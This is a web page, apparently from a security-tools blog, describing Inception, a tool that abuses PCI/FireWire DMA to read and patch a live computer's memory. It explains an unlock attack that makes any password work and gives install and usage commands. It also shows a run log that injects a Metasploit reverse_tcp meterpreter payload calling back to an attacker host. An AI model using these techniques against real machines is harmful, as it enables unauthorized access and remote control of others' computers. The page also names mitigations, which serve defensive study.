– Fixed some minor issues and merged SLOTSCREAMER
– Added slotscreamer interface and a generic Getty signature
Inception is a physical memory manipulation and hacking tool exploiting PCI-based DMA. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe HW interfaces.
Inception aims to provide a relatively quick, stable and easy way of performing intrusive and non-intrusive memory hacks against live computers using DMA.
How it works:
– Inception’s modules work as follows: By presenting a Serial Bus Protocol 2 (SBP-2) unit directory to the victim machine over the IEEE1394 FireWire interface, the victim operating system thinks that a SBP-2 device has connected to the FireWire port. Since SBP-2 devices utilize Direct Memory Access (DMA) for fast, large bulk data transfers (e.g., FireWire hard drives and digital camcorders), the victim lowers its shields and enables DMA for the device. The tool now has full read/write access to the lower 4GB of RAM on the victim.
– Once DMA is granted, the tool proceeds to search through available memory pages for signatures at certain offsets in the operating system’s code. Once found, the tool manipulates this code. For instance, in the unlock module, the tool short circuits the operating system’s password authentication module that is triggered if an incorrect password is entered.
– After running that module you should be able to log into the victim machine using any password.
– An analogy for this operation is planting an idea into the memory of the machine; the idea that every password is correct. In other words, the equivalent of a memory inception.
OS X > 10.7.2 and Windows > 8.1 disables FireWire DMA when the user has locked the OS and thus prevents inception. The tool will still work while a user is logged on. However, this is a less probable attack scenario IRL.
In addition, OS X Mavericks > 10.8.2 on Ivy Bridge (>= 2012 Macs) have enabled VT-D, effectively blocking DMA requests and thwarting all inception modules. Look for vtd fault entries in your log/console.
— Attacker machine: Linux or Mac OS X (host / attacker machine) with a FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port. Linux is currently recommended due to buggy firewire interfaces on OS X
— Victim machine: A FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port
— Python 3
— gcc (incl. g++)
— pip (for automatic resolution of dependencies)
- Inception may not work reliably against machines with more than 4 GiB RAM, as the signatures the tool look for may be loaded at a memory address >
0xffffffff. You may still be able to exploit the target by dumping as much memory as possible and, say, search for encryption keys.
- You may have trouble reading above 2 GiB on targets with more than 2 GiB RAM. This is due to the way the memory controller provisions physical addresses. Since there’s currently no way of detecting (over FireWire) how much physical memory the target has, the tool will continue to attempt to read memory up to the 4 GiB limit. You will see a noticeable slowdown in reading when the tool tries to read data from addresses that doesn’t map to hardware RAM.
- OS X Lion disables DMA when the user is logged out/screen is locked and FileVault is enabled. Attacking will only work while the user is logged in, or if user switching is enabled. The user switching trick only works for versions before 10.7.2, where the vulnerability is patched.
- If you have a OF/EFI firmware password set on the target Mac OS X, FireWire DMA is off by default.
Author: Carsten Maartmann-Moe (firstname.lastname@example.org) AKA ntropy
The tool makes use of the libforensic1394 library courtesy of Freddie Witherden under a LGPL license.
On Debian-based distributions the installation command lines can be summarized as:
sudo apt-get install git cmake g++ python3 python3-pip
On OS X, you can install the tool requirements with homebrew:
brew install git cmake python3
After installing the requirements, download and install libforensic1394:
git clone git://git.freddie.witherden.org/forensic1394.git
sudo make install
sudo python3 setup.py install
Download and install Inception
git clone git://github.com/carmaa/inception.git
The setup script should be able to install dependencies if you have pip installed.
General usage :
1. Connect the attacker machine (host) and the victim (target) with a FireWire cable
2. Run Inception
incept [module name]
For a more complete and up-to-date description, run:
incept implant --msfpw password --msfopts LHOST=172.16.1.1
_| _| _| _|_|_| _|_|_|_| _|_|_| _|_|_| _| _|_| _| _|
_| _|_| _| _| _| _| _| _| _| _| _| _|_| _|
_| _| _| _| _| _|_|_| _|_|_| _| _| _| _| _| _| _|
_| _| _|_| _| _| _| _| _| _| _| _| _|_|
_| _| _| _|_|_| _|_|_|_| _| _| _| _|_| _| _|
v.0.4.0 (C) Carsten Maartmann-Moe 2014
Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter
[?] Will potentially write to file. OK? [y/N] y
[!] This module currently only work as a proof-of-concept against Windows 7 SP1
x86. No other OSes, versions or architectures are supported, nor is there
any guarantee that they will be supported in the future.
[?] What MSF payload do you want to use? windows/meterpreter/reverse_tcp
[*] Selected options:
[*] LPORT: 4444
[*] LHOST: 172.16.1.1
[*] EXITFUNC: thread
[*] Stage 1: Searcing for injection point
[================================> ] 537 MiB ( 53%)
[*] Signature found at 0x219d118c in page no. 137681
[*] Patching at 0x219d118c
[\] Waiting to ensure stage 1 execution
[*] Restoring memory at initial injection point
[*] Stage 2: Searching for page allocated in stage 1
[=========================> ] 434 MiB ( 42%)
[*] Signature found at 0x1b2d9000 in page no. 111321
[*] Patching at 0x1b2d9000
[*] Patch verified; successful
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!<strong style="color: #00ff00; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 16px; line-height: 1.5; background-color: #ffffff;"> </strong>
For Source & More Detail read here : http://www.breaknenter.org/projects/inception/
Disclaimer from Developers:
Do no evil with this tool. Also, I am a pentester, not a developer. So if you see weird code that bugs your pythonesque purity senses, drop me a note on how I can improve it. Or even better, fork my code, change it and issue a pull request.